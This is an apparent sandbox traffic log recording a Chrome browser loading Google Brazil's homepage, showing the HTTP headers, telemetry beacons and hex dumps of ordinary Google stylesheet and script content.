6c 61 79 3a 6e 6f 6e 65 7d 63 2d 77 69 7a 2e 72 45 54 53 44 7b 63 6f 6e 74 61 69 6e 3a 6e Data Ascii: rotate(130deg)}50%{transform:rotate(-5deg)}100%{transform:rotate(130deg)}}@keyframes qli-right-spin{0%{transform:rotate(-130deg)}50%{transform:rotate(5deg)}100%{transform:rotate(-130deg)}}c-wiz{contain:style}c-wiz>c-data{display:none}c-wiz.rETSD{contain:n
2024-07-04 17:43:06 UTC	1390	IN	Data Raw: 30 25 7d 2e 5a 65 56 42 74 63 7b 63 6f 6c 6f 72 3a 72 67 62 28 39 35 2c 39 39 2c 31 30 34 29 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 5c 22 47 6f 6f 67 6c 65 20 53 61 6e 73 5c 22 2c 52 6f 62 6f 74 6f 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 35 70 78 3b 6d 61 78 2d 77 69 64 74 68 3a 33 30 30 70 78 7d 2e 61 6c 54 42 51 65 7b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 72 67 62 28 32 35 32 2c 32 33 32 2c 32 33 30 29 3b 62 6f 72 64 65 72 2d 74 6f 70 2d 6c 65 66 74 2d 72 61 64 69 75 73 3a 38 70 78 3b 62 6f 72 64 65 72 2d 74 6f 70 2d 72 69 67 68 74 2d 72 61 64 69 75 73 3a 38 70 78 3b 6a 75 73 74 69 66 79 Data Ascii: 0%}.ZeVBtc{color:rgb(95,99,104);font-family:\"Google Sans\",Roboto,Arial,sans-serif;font-size:16px;line-height:25px;max-width:300px}.alTBQe{align-items:center;background-color:rgb(252,232,230);border-top-left-radius:8px;border-top-right-radius:8px;justify
2024-07-04 17:43:06 UTC	1390	IN	Data Raw: 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 32 30 70 78 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 32 30 70 78 7d 2e 50 58 54 36 63 64 7b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 34 70 78 7d 2e 63 42 39 4d 37 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 72 67 62 28 32 31 38 2c 32 32 30 2c 32 32 34 29 3b 63 6f 6c 6f 72 3a 72 67 62 28 36 30 2c 36 34 2c 36 37 29 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 33 36 70 78 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 66 6c 65 78 3b 66 6c 65 78 2d 67 72 6f 77 3a 31 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 66 6f 6e 74 2d 66 61 Data Ascii: ,sans-serif;font-size:14px;margin-left:20px;margin-right:20px}.PXT6cd{display:flex;margin-top:14px}.cB9M7{background-color:#fff;border:1px solid rgb(218,220,224);color:rgb(60,64,67);border-radius:36px;display:inline-flex;flex-grow:1;font-size:14px;font-fa
2024-07-04 17:43:06 UTC	1390	IN	Data Raw: 74 72 79 7b 0a 5f 2e 79 28 22 42 32 71 6c 50 65 22 29 3b 0a 76 61 72 20 73 74 62 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 5f 2e 6c 66 2e 63 61 6c 6c 28 74 68 69 73 2c 61 2e 4f 61 29 7d 3b 5f 2e 41 28 73 74 62 2c 5f 2e 6c 66 29 3b 73 74 62 2e 4a 61 3d 5f 2e 6c 66 2e 4a 61 3b 73 74 62 2e 70 72 6f 74 6f 74 79 70 65 2e 75 66 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 6f 72 28 76 61 72 20 61 3d 5f 2e 24 64 28 22 73 22 2c 5f 2e 24 45 61 29 2c 62 3d 5f 2e 4e 61 28 61 29 2c 63 3d 62 2e 6e 65 78 74 28 29 3b 21 63 2e 64 6f 6e 65 3b 63 3d 62 2e 6e 65 78 74 28 29 29 63 3d 63 2e 76 61 6c 75 65 2c 63 2e 6b 65 79 2e 69 6e 63 6c 75 64 65 73 28 22 54 77 64 49 46 43 22 29 26 26 21 63 2e 6b 65 79 2e 69 6e 63 6c 75 64 65 73 28 28 30 2c 5f 2e 6c 6d 2e 65 42 29 28 29 29 26 26 61 2e Data Ascii: try{_.y("B2qlPe");var stb=function(a){_.lf.call(this,a.Oa)};_.A(stb,_.lf);stb.Ja=_.lf.Ja;stb.prototype.uf=function(){for(var a=_.$d("s",_.$Ea),b=_.Na(a),c=b.next();!c.done;c=b.next())c=c.value,c.key.includes("TwdIFC")&&!c.key.includes((0,_.lm.eB)())&&a.
2024-07-04 17:43:06 UTC	1390	IN	Data Raw: 74 65 6e 65 72 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 29 7b 61 26 26 74 68 69 73 2e 6f 61 26 26 74 68 69 73 2e 59 61 2e 70 75 73 68 28 74 68 69 73 2e 6f 61 2e 6c 69 73 74 65 6e 28 61 2c 62 2c 63 2c 64 3d 3d 3d 76 6f 69 64 20 30 3f 21 31 3a 64 2c 65 29 29 7d 3b 5f 2e 64 58 62 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 61 2e 6f 61 26 26 61 2e 77 62 2e 70 75 73 68 28 63 58 62 28 62 2c 63 29 29 7d 3b 5f 2e 65 58 62 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 29 7b 65 3d 65 3d 3d 3d 76 6f 69 64 20 30 3f 21 31 3a 65 3b 69 66 28 61 2e 51 61 5b 64 5d 29 7b 69 66 28 21 65 29 72 65 74 75 72 6e 3b 28 65 3d 61 2e 51 61 5b 64 5d 29 26 26 5f 2e 62 61 2e 63 6c 65 61 72 54 69 6d 65 6f 75 74 28 65 29 7d 61 2e 51 61 5b 64 5d 3d 63 58 Data Ascii: tener=function(a,b,c,d,e){a&&this.oa&&this.Ya.push(this.oa.listen(a,b,c,d===void 0?!1:d,e))};_.dXb=function(a,b,c){a.oa&&a.wb.push(cXb(b,c))};_.eXb=function(a,b,c,d,e){e=e===void 0?!1:e;if(a.Qa[d]){if(!e)return;(e=a.Qa[d])&&_.ba.clearTimeout(e)}a.Qa[d]=cX
2024-07-04 17:43:06 UTC	1390	IN	Data Raw: 2c 65 3d 6e 75 6c 6c 3b 63 2e 68 61 6e 64 6c 65 72 26 26 28 65 3d 63 2e 68 61 6e 64 6c 65 72 29 3b 64 2e 63 61 6c 6c 28 65 2c 6e 65 77 20 5f 2e 4d 6b 28 62 29 29 7d 29 7d 3b 5f 2e 6a 58 62 2e 70 72 6f 74 6f 74 79 70 65 2e 44 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 73 77 69 74 63 68 28 5f 2e 73 64 28 29 2e 67 65 74 56 69 73 69 62 69 6c 69 74 79 53 74 61 74 65 28 29 29 7b 63 61 73 65 20 22 75 6e 6c 6f 61 64 65 64 22 3a 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 75 6e 6c 6f 61 64 26 26 6b 58 62 28 74 68 69 73 2c 22 61 74 74 6e 2d 69 76 69 73 22 29 3b 62 72 65 61 6b 3b 63 61 73 65 20 22 68 69 64 64 65 6e 22 3a 6b 58 62 28 74 68 69 73 2c 22 61 74 74 6e 2d 69 76 69 73 22 29 3b 62 72 65 61 6b 3b 63 61 73 65 20 22 76 69 73 69 62 6c 65 22 3a 6b 58 62 28 74 68 69 73 2c Data Ascii: ,e=null;c.handler&&(e=c.handler);d.call(e,new _.Mk(b))})};_.jXb.prototype.Da=function(){switch(_.sd().getVisibilityState()){case "unloaded":this.options.unload&&kXb(this,"attn-ivis");break;case "hidden":kXb(this,"attn-ivis");break;case "visible":kXb(this,
2024-07-04 17:43:06 UTC	1390	IN	Data Raw: 61 29 7b 76 61 72 20 62 3d 5f 2e 66 6d 28 5f 2e 56 63 28 22 53 30 36 47 72 62 22 29 2c 22 22 29 3f 22 6c 22 3a 22 73 22 3b 72 65 74 75 72 6e 20 5f 2e 24 64 28 62 2c 61 2e 42 61 29 7d 3b 76 61 72 20 6d 58 62 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 5f 2e 72 78 2e 63 61 6c 6c 28 74 68 69 73 2c 61 29 7d 3b 5f 2e 41 28 6d 58 62 2c 5f 2e 72 78 29 3b 6d 58 62 2e 70 72 6f 74 6f 74 79 70 65 2e 6b 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 3b 76 61 72 20 6e 58 62 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 79 3d 74 68 69 73 2e 78 3d 74 68 69 73 2e 6b 61 3d 30 7d 3b 5f 2e 73 78 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 65 76 65 6e 74 54 79 70 65 3d 22 22 3b 74 68 69 73 2e 6b 61 3d 30 7d 3b 5f 2e 73 78 2e 70 72 6f 74 6f 74 79 70 65 2e 44 61 3d 66 75 6e Data Ascii: a){var b=_.fm(_.Vc("S06Grb"),"")?"l":"s";return _.$d(b,a.Ba)};var mXb=function(a){_.rx.call(this,a)};_.A(mXb,_.rx);mXb.prototype.ka=function(){};var nXb=function(){this.y=this.x=this.ka=0};_.sx=function(){this.eventType="";this.ka=0};_.sx.prototype.Da=fun

Timestamp	Bytes transferred	Direction	Data
2024-07-04 17:43:06 UTC	1479	OUT	POST /gen_204?s=webhp&t=aft&atyp=csi&ei=J9-GZvKjJq-Jxc8Pk7aqmA0&rt=wsrt.3901,aft.1379,afti.1379,cbt.97,hst.96,prt.1047&imn=11&ima=2&imad=0&imac=0&wh=907&aftie=NF&aft=1&aftp=907&opi=89978449 HTTP/1.1 Host: www.google.com.br Connection: keep-alive Content-Length: 0 sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-arch: "x86" sec-ch-ua-full-version: "117.0.5938.132" Content-Type: text/plain;charset=UTF-8 sec-ch-ua-platform-version: "10.0.0" sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132" sec-ch-ua-bitness: "64" sec-ch-ua-model: "" sec-ch-ua-wow64: ?0 sec-ch-ua-platform: "Windows" Accept: / Origin: https://www.google.com.br X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUX Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty Referer: https://www.google.com.br/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: AEC=AVYB7cq9qpLJtwr_4wn6NSmj1M2L8sIKMTV2uqdncAQEzqqvSiIgeGgGkw; NID=515=rRBxRmJa0EpbZFLBmIw0OARb1ECo0TN6kBMUJ3KsZiO3FjmZRPHNzcSANFCPHOKq2LNPNVl_GnJ_E3CS7ETtmHCXqb56gef_UpALXxC-tS80FXnRBSev-If-hQpQpMPDdvyzxhlw_gyJu7IBhtrSyY-npOLrVKEHVXEr68Aj7gQ
2024-07-04 17:43:06 UTC	715	IN	HTTP/1.1 204 No Content Content-Type: text/html; charset=UTF-8 Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-pDKmhwL_k_T3pcTFC7MUtQ' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/other"}]} Permissions-Policy: unload=() Date: Thu, 04 Jul 2024 17:43:06 GMT Server: gws Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Timestamp	Bytes transferred	Direction	Data
2024-07-04 17:43:06 UTC	1863	OUT	POST /gen_204?atyp=csi&ei=J9-GZvKjJq-Jxc8Pk7aqmA0&s=webhp&t=all&imn=11&ima=2&imad=0&imac=0&wh=907&aftie=NF&aft=1&aftp=907&adh=&ime=1&imeae=0&imeap=0&imex=1&imeh=0&imeha=0&imehb=0&imea=0&imeb=0&imel=0&imed=0&imeeb=0&scp=0&cb=205653&ucb=205653&mem=ujhs.6,tjhs.10,jhsl.2173,dm.8&nv=ne.1,feid.62fc9447-4556-440a-8b9a-5cf3e8b62e83&net=dl.1450,ect.3g,rtt.300&hp=&sys=hc.4&p=bs.true&rt=hst.96,cbt.97,prt.1047,afti.1379,aftip.1045,aft.1379,aftqf.1380,xjses.1934,xjsee.1982,xjs.1982,lcp.1407,fcp.1108,wsrt.3901,cst.678,dnst.10,rqst.728,rspt.373,sslt.678,rqstt.3546,unt.2855,cstt.2868,dit.4986&zx=1720114985264&opi=89978449 HTTP/1.1 Host: www.google.com.br Connection: keep-alive Content-Length: 0 sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-arch: "x86" sec-ch-ua-full-version: "117.0.5938.132" sec-ch-ua-platform-version: "10.0.0" sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132" sec-ch-ua-bitness: "64" sec-ch-ua-model: "" sec-ch-ua-wow64: ?0 sec-ch-ua-platform: "Windows" Accept: / Origin: https://www.google.com.br X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUX Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty Referer: https://www.google.com.br/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: AEC=AVYB7cq9qpLJtwr_4wn6NSmj1M2L8sIKMTV2uqdncAQEzqqvSiIgeGgGkw; NID=515=rRBxRmJa0EpbZFLBmIw0OARb1ECo0TN6kBMUJ3KsZiO3FjmZRPHNzcSANFCPHOKq2LNPNVl_GnJ_E3CS7ETtmHCXqb56gef_UpALXxC-tS80FXnRBSev-If-hQpQpMPDdvyzxhlw_gyJu7IBhtrSyY-npOLrVKEHVXEr68Aj7gQ
2024-07-04 17:43:06 UTC	715	IN	HTTP/1.1 204 No Content Content-Type: text/html; charset=UTF-8 Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-VTJSbpijGGNEdIgWATaHeQ' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/other"}]} Permissions-Policy: unload=() Date: Thu, 04 Jul 2024 17:43:06 GMT Server: gws Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Timestamp	Bytes transferred	Direction	Data
2024-07-04 17:43:06 UTC	1216	OUT	GET /widget/callout?prid=19037050&pgid=19037049&puid=9ceb59a7585b55bd&cce=1&dc=1&origin=https%3A%2F%2Fwww.google.com.br&cn=callout&pid=1&spid=538&hl=en HTTP/1.1 Host: ogs.google.com.br Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUX Sec-Fetch-Site: same-site Sec-Fetch-Mode: navigate Sec-Fetch-Dest: iframe Referer: https://www.google.com.br/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: AEC=AVYB7cq9qpLJtwr_4wn6NSmj1M2L8sIKMTV2uqdncAQEzqqvSiIgeGgGkw; NID=515=rRBxRmJa0EpbZFLBmIw0OARb1ECo0TN6kBMUJ3KsZiO3FjmZRPHNzcSANFCPHOKq2LNPNVl_GnJ_E3CS7ETtmHCXqb56gef_UpALXxC-tS80FXnRBSev-If-hQpQpMPDdvyzxhlw_gyJu7IBhtrSyY-npOLrVKEHVXEr68Aj7gQ
2024-07-04 17:43:07 UTC	2087	IN	HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 X-Frame-Options: ALLOW-FROM https://www.google.com.br Content-Security-Policy: frame-ancestors https://www.google.com.br Content-Security-Policy: script-src 'report-sample' 'nonce-zjz7imOjNLEhkKt_nzjmBw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/OneGoogleWidgetUi/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/OneGoogleWidgetUi/cspreport/allowlist Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/OneGoogleWidgetUi/cspreport x-ua-compatible: IE=edge Expires: Thu, 04 Jul 2024 17:43:07 GMT Date: Thu, 04 Jul 2024 17:43:07 GMT Cache-Control: private, max-age=3600 Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Cross-Origin-Embedder-Policy-Report-Only: require-corp; report-to="CoepOneGoogleWidgetUi" Report-To: {"group":"CoepOneGoogleWidgetUi","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/OneGoogleWidgetUi"}]} Cross-Origin-Opener-Policy: same-origin Cross-Origin-Resource-Policy: same-site Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version reporting-endpoints: default="/_/OneGoogleWidgetUi/web-reports?context=eJzjstHikmJw0JBiKFj5gkni60smNSB2Sp_BGgDEPvUzWKOAuPXmOdbJQJz07zxrARAvibjIeiDxIqsQN8fqfbO3sAk82P85SkktKb8wPj8vNT0_Pz0nNaOkpKA4tagstSjeyMDIxMDM2EDP0DC-wBAAIqwsnQ" Server: ESF X-XSS-Protection: 0 X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-07-04 17:43:07 UTC	2087	IN	Data Raw: 38 30 30 30 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 22 6c 74 72 22 3e 3c 68 65 61 64 3e 3c 62 61 73 65 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6f 67 73 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2e 62 72 2f 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 2f 2f 77 77 77 2e 67 73 74 61 74 69 63 2e 63 6f 6d 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6f 72 69 67 69 6e 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 63 61 6e 6f 6e 69 63 61 6c 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6f 67 73 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2e 62 72 2f 77 69 64 67 65 74 2f 63 61 6c 6c 6f 75 74 22 3e 3c 6c 69 6e 6b Data Ascii: 8000<!doctype html><html lang="en" dir="ltr"><head><base href="https://ogs.google.com.br/"><link rel="preconnect" href="//www.gstatic.com"><meta name="referrer" content="origin"><link rel="canonical" href="https://ogs.google.com.br/widget/callout"><link
2024-07-04 17:43:07 UTC	2087	IN	Data Raw: 5f 6c 61 74 65 6e 63 79 5f 73 74 61 72 74 5f 74 69 6d 65 3b 61 2e 63 73 73 5f 73 69 7a 65 3d 30 3b 61 2e 63 63 5f 6c 61 74 65 6e 63 79 3d 5b 5d 3b 61 2e 63 63 54 69 63 6b 3d 67 3b 61 2e 6f 6e 4a 73 4c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 67 28 22 6a 73 6c 22 29 7d 3b 61 2e 6f 6e 43 73 73 4c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 67 28 22 63 73 73 6c 22 29 7d 3b 61 2e 5f 69 73 56 69 73 69 62 6c 65 3d 66 75 6e 63 74 69 6f 6e 28 62 2c 63 29 7b 69 66 28 21 63 7c 7c 63 2e 73 74 79 6c 65 2e 64 69 73 70 6c 61 79 3d 3d 22 6e 6f 6e 65 22 29 72 65 74 75 72 6e 21 31 3b 76 61 72 20 66 3d 62 2e 64 65 66 61 75 6c 74 56 69 65 77 3b 69 66 28 66 26 26 66 2e 67 65 74 43 6f 6d 70 75 74 65 64 53 74 79 6c 65 26 26 28 66 3d 66 2e 67 65 74 43 6f 6d 70 75 74 65 64 Data Ascii: _latency_start_time;a.css_size=0;a.cc_latency=[];a.ccTick=g;a.onJsLoad=function(){g("jsl")};a.onCssLoad=function(){g("cssl")};a._isVisible=function(b,c){if(!c\|\|c.style.display=="none")return!1;var f=b.defaultView;if(f&&f.getComputedStyle&&(f=f.getComputed
2024-07-04 17:43:07 UTC	2087	IN	Data Raw: 3a 31 30 30 25 7d 2e 53 53 50 47 4b 66 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 6f 76 65 72 66 6c 6f 77 2d 79 3a 68 69 64 64 65 6e 3b 7a 2d 69 6e 64 65 78 3a 31 7d 2e 65 65 6a 73 44 63 7b 6f 76 65 72 66 6c 6f 77 2d 79 3a 61 75 74 6f 3b 2d 77 65 62 6b 69 74 2d 6f 76 65 72 66 6c 6f 77 2d 73 63 72 6f 6c 6c 69 6e 67 3a 74 6f 75 63 68 7d 2e 4d 43 63 4f 41 63 7b 62 6f 74 74 6f 6d 3a 30 3b 6c 65 66 74 3a 30 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 72 69 67 68 74 3a 30 3b 74 6f 70 3a 30 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 7a 2d 69 6e 64 65 78 3a 31 7d 2e 4d 43 63 4f 41 63 3e 2e 70 47 78 70 48 63 7b 66 6c 65 78 2d 73 68 72 69 6e 6b 3a 30 3b 66 6c 65 78 2d 67 72 6f 77 3a 30 7d 2e 49 71 42 66 4d 3e 2e 48 4c 6c 41 48 62 7b 61 6c 69 Data Ascii: :100%}.SSPGKf{display:block;overflow-y:hidden;z-index:1}.eejsDc{overflow-y:auto;-webkit-overflow-scrolling:touch}.MCcOAc{bottom:0;left:0;position:absolute;right:0;top:0;overflow:hidden;z-index:1}.MCcOAc>.pGxpHc{flex-shrink:0;flex-grow:0}.IqBfM>.HLlAHb{ali
2024-07-04 17:43:07 UTC	2087	IN	Data Raw: 62 61 63 6b 67 72 6f 75 6e 64 3a 76 61 72 28 2d 2d 67 6d 33 2d 73 79 73 2d 63 6f 6c 6f 72 2d 73 75 72 66 61 63 65 2d 63 6f 6e 74 61 69 6e 65 72 2d 68 69 67 68 2c 23 32 38 32 61 32 63 29 7d 2e 4e 4b 6d 46 4e 63 2e 76 51 34 33 49 65 20 2e 54 6e 75 67 5a 63 2c 2e 61 6d 45 30 4d 64 2e 4e 4b 6d 46 4e 63 2e 76 51 34 33 49 65 20 2e 54 6e 75 67 5a 63 7b 63 6f 6c 6f 72 3a 23 63 34 63 37 63 35 3b 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 67 6d 33 2d 73 79 73 2d 63 6f 6c 6f 72 2d 6f 6e 2d 73 75 72 66 61 63 65 2d 76 61 72 69 61 6e 74 2c 23 63 34 63 37 63 35 29 7d 2e 4e 4b 6d 46 4e 63 2e 76 51 34 33 49 65 20 2e 68 58 68 68 71 2c 2e 61 6d 45 30 4d 64 2e 4e 4b 6d 46 4e 63 2e 76 51 34 33 49 65 20 2e 68 58 68 68 71 7b 63 6f 6c 6f 72 3a 23 65 33 65 33 65 33 3b 63 6f 6c 6f 72 3a Data Ascii: background:var(--gm3-sys-color-surface-container-high,#282a2c)}.NKmFNc.vQ43Ie .TnugZc,.amE0Md.NKmFNc.vQ43Ie .TnugZc{color:#c4c7c5;color:var(--gm3-sys-color-on-surface-variant,#c4c7c5)}.NKmFNc.vQ43Ie .hXhhq,.amE0Md.NKmFNc.vQ43Ie .hXhhq{color:#e3e3e3;color:
2024-07-04 17:43:07 UTC	2087	IN	Data Raw: 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 35 30 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 34 30 70 78 3b 6f 75 74 6c 69 6e 65 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 20 32 34 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 72 6d 61 6c 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 38 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 20 31 32 70 78 7d 2e 4e 4b 6d 46 4e 63 20 2e 72 72 34 79 35 63 7b 63 6f 6c 6f 72 3a 23 61 38 63 37 66 61 3b 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 67 6d 33 2d 73 79 73 2d Data Ascii: ;font-size:14px;font-weight:500;min-height:40px;outline:none;padding:10px 24px;text-align:center;text-decoration:none;white-space:normal;line-height:18px;position:relative;cursor:pointer;padding:10px 12px}.NKmFNc .rr4y5c{color:#a8c7fa;color:var(--gm3-sys-
2024-07-04 17:43:07 UTC	2087	IN	Data Raw: 6f 63 75 73 2c 2e 79 5a 71 4e 6c 3a 61 63 74 69 76 65 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 62 35 37 64 30 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 67 6d 33 2d 73 79 73 2d 63 6f 6c 6f 72 2d 70 72 69 6d 61 72 79 2c 23 30 62 35 37 64 30 29 7d 2e 79 5a 71 4e 6c 3a 68 6f 76 65 72 3a 66 6f 63 75 73 2c 2e 79 5a 71 4e 6c 3a 66 6f 63 75 73 2c 2e 79 5a 71 4e 6c 3a 61 63 74 69 76 65 7b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 7d 2e 79 5a 71 4e 6c 3a 68 6f 76 65 72 7b 62 6f 78 2d 73 68 61 64 6f 77 3a 30 20 31 70 78 20 33 70 78 20 31 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 2e 31 35 29 2c 30 20 31 70 78 20 32 70 78 20 30 20 72 67 62 61 28 30 2c 30 2c 30 2c 2e 33 29 7d 2e 4e 4b 6d 46 4e 63 20 2e 79 5a 71 4e 6c Data Ascii: ocus,.yZqNl:active{background-color:#0b57d0;background-color:var(--gm3-sys-color-primary,#0b57d0)}.yZqNl:hover:focus,.yZqNl:focus,.yZqNl:active{box-shadow:none}.yZqNl:hover{box-shadow:0 1px 3px 1px rgba(0,0,0,.15),0 1px 2px 0 rgba(0,0,0,.3)}.NKmFNc .yZqNl
